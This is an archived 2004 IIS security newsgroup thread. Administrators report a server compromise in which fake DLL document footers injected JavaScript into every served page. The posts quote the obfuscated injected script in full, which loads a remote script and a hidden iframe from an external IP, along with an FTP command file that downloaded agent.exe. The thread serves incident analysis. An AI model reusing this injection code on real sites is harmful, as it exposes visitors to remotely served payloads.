Re: Russian IIS hack? Malicious Javascript code

From: Ron Guyor (rong_at_youngsinc.com)
Date: 06/24/04

  • Next message: Marc Krueger: "Russian IIS hack? Malicious Javascript code"
    Date: Thu, 24 Jun 2004 10:07:50 -0400
    
    

    I just found some files from the 23rd in my system32 directory. They are
    ftpcmd.txt and agent.exe. The ftpcmd.txt file has this:

    ---
    binary
    get agent.exe
    bye
    ---
    That could be where it's coming from.
    Ron
    "Oca Hoeflein" <Oca Hoeflein@discussions.microsoft.com> wrote in message
    news:F5E81692-8CC7-471B-9751-3A9C69ECB013@microsoft.com...
    > I successfully removed some malicious code from my IIS 5.0 server that may
    not have had all it's patches updated, but I cannot find any information on
    this malicious code that redirected on a random basis the users of my
    websites to a russian website that appeared to be down. to a domain called
    balamut.com
    > with an IP address of 217.107.218.147 which RDNS to
    > unassigned.m10-msk-ru.e-neverland.net
    >
    > The javascript code lived in some fake dll files in the inetsrv folder.
    > One fake .dll file was created for each web on my server and in the IIS
    metabase the defaultdocfooter was set to each of the dll files and
    enabledocfooter was set to true.
    >
    > the offending code was embedded in every file that the website delivered
    and pages that had embedded .js files the javascript for those pages would
    not function.
    >
    > I have posted the offending code, mabye someone can identify this?
    >
    > As proof check out a google search for one of the function in the code
    okx12()
    >
    > you'll see the first link it returns is an RTF if you view the html
    version you'll see this code appended to the bottom of the page.
    >
    > <script language="JavaScript"><!--
    > var qxco7=document.cookie;function gc099(n21){var
    ix=qxco7.indexOf(n21+"=");if(ix==-1)return
    null;ix=qxco7.indexOf("=",ix)+1;var
    es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return
    unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new
    Date();var expiry=new
    Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+esc
    ape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function
    okx12(){window.status="";setTimeout("okx12()",
    200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null
    ){document.write("<script language=\"JavaScript\"
    src=\"http://217.107.218.147/dot.php\"></script><iframe
    src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
    scrolling=\"no\"
    frameborder=\"no\"/>");sc088("trk716","4");}}// --></script>
    >
    >
    

  • Next message: Marc Krueger: "Russian IIS hack? Malicious Javascript code"

    Relevant Pages

    • Re: Russian IIS hack? Malicious Javascript code
      ... I still suspect this is a backdoor. ... > websites to a russian website that appeared to be down. ... >> The javascript code lived in some fake dll files in the inetsrv folder. ... >> the offending code was embedded in every file that the website delivered ...
      (microsoft.public.inetserver.iis.security)
    • RE: Russian IIS hack? Malicious Javascript code
      ... they say that there is no removal for the virus but not to worry because it only affects webservers. ... I removed the check and moved the .dll files to another directory. ... > The javascript code lived in some fake dll files in the inetsrv folder. ... > the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function. ...
      (microsoft.public.inetserver.iis.security)
    • RE: Russian IIS hack? Malicious Javascript code
      ... Isn't this a repeat of a document footer worm from a couple of years ago? ... I removed the check and moved the .dll files to another directory. ... >> The javascript code lived in some fake dll files in the inetsrv folder. ... >> the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function. ...
      (microsoft.public.inetserver.iis.security)
    • Re: Russian IIS hack? Malicious Javascript code
      ... websites to a russian website that appeared to be down. ... > The javascript code lived in some fake dll files in the inetsrv folder. ... > the offending code was embedded in every file that the website delivered ...
      (microsoft.public.inetserver.iis.security)
    • Re: Russian IIS hack? Malicious Javascript code
      ... > The javascript code lived in some fake dll files in the inetsrv folder. ... > One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true. ... > the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function. ... Noticed it right away because it broke OWA and I get ...
      (microsoft.public.inetserver.iis.security)